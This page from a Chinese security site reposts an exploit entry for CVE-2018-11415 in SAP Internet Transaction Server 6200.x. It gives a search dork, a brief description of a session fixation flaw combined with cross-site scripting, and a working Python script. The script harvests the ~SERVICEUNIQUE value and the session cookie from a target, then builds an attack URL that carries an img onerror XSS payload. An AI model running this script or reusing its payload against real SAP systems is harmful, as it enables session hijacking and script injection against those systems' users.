首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting
来源:0xd0m7 作者:Lencina 发布时间:2018-05-28  

# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting
# Dork: /scripts/wgate/
# Date: 25.05.2018
# Exploit Author: J. Carrillo Lencina (0xd0m7)
# Vendor Homepage: https://www.sap.com
# Version: SAP ITS 6200.X.X
# Category: Webapps
# Tested on: All Platforms
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11415
# Description:As it has been determined that there are two
vulnerabilities in the latest developed version of SAP ITS, these two
vulnerabilities added together give rise to an XSS.

#Technical details: It has been determined that when an unauthenticated
user navigates through the application, the application assigns a cookie,
that cookie is assigned in the parameter ~ session, therefore it could be
possible for an attacker to fix the fallo ~ session through a request GET
This, together with the fact that the parameter SERVICEUNIQUE has a
parameter validation failure, results in a single-use XSS, since the
session expires once the method of the request is exchanged and fixed in
the URL.

#Exploit
#!/usr/bin/python
import argparse
import requests
import re
 
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Example: https://example.com/wgate/scripts/ralp/!")
args = parser.parse_args()
list=[]
i=0
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}
url=args.url.split('/')
url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/'

if args.url:
 r = requests.get(args.url,verify=False,cookies=cookie)
 header = r.headers['Set-Cookie']
 cookie_val = header.split(";")

 for line in r.iter_lines():
         list.append(line)
         i=i+1
         if line.find('~SERVICEUNIQUE') > 0:
                 param = line.replace('"','')
                 v = param.split('=')
                 val0 = v[3].split(' ')
   print '[+]Random Value:',val0[0]

 for line2 in range(len(cookie_val)):
         if cookie_val[line2].find('~session') == 0:
                 val1 = cookie_val[line2].split('=')
   print '[+]Session Value:',val1[1]
 print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]


else:
 print '[!] Empty URL, please see help (-h,--help)'


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GNU glibc < 2.27 - Local Buffe
·Microsoft Edge Chakra - Cross
·Microsoft Internet Explorer 11
·Skia and Firefox - Integer Ove
·Siemens SCALANCE S613 - Remote
·D-Link DSL-2750B - OS Command
·FTPShell Server 6.80 - Denial
·Bitmain Antminer D3/L3+/S9 - R
·FTPShell Server 6.80 - Buffer
·CloudMe Sync < 1.11.0 - Buffer
·Linux 4.4.0 < 4.4.0-53 - AF_PA
·ALFTP 5.31 - Local Buffer Over
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved